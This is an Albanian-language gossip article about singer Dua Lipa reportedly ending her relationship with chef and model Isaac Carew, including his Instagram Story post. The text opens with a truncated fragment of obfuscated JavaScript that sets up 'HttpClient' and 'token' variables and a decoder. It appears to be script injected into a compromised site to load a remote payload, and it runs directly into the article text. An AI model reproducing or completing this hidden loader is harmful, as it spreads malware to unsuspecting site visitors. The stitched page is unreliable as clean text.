;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Isaac Carew i pikëlluar nga ndarja me Duan, ja cfarë poston në Instagram

By

Këngëtarja Dua Lipa, po raportohet t’i ketë dhënë fund lidhjes së dashurisë me kuzhinierin e modelin britanik, Isaac Carew.

Dyshja po thuhet të jenë ndarë për shkak të agjendës së ngjeshur të Duas, e cila gjatë tërë kohës është me koncerte në mbarë botën.

Fillimisht ajo kishte nisur takimet me 33 vjeçarin në vitin 2013-të dhe ata ishin bashkë për tri vjet e gjysmë, deri në vitin 2017-të.

Super ylli i muzikës, iu ka dhënë fund gjërave në fillim të kësaj jave, ndërsa Isaac e ka bërë Duan unfollow të martën mbrëma.

Më pas e ka bërë publik faktin se po vuan nga ndarja!

Isaac kishte publikuar një fotografi që prezantonte emocionet e tij në Instagram Story, një djalosh duke vuajtur që na bën të kuptojmë që ai është i lënduar.

Një burim i gazetës britanike The Sun, ka thënë se “Dua dhe Isaac, e kishin shumë të vështirë që të takoheshin me njëri tjetrin që kur u pajtuan. Ata donin që t’i kishin gjërat në funksion mirë ajo vetëm po bëhet më e zënë. Ka qenë një vendim i vështirë për ta, mirëpo përfundimisht, nuk ia arritën që të jenë bashkë”, transmeton Prive. /Prive.al

 Isaac suggested he was hurting inside in a cryptic post on his Instagram Story on Wednesday morning

Artikuj të ngjashëm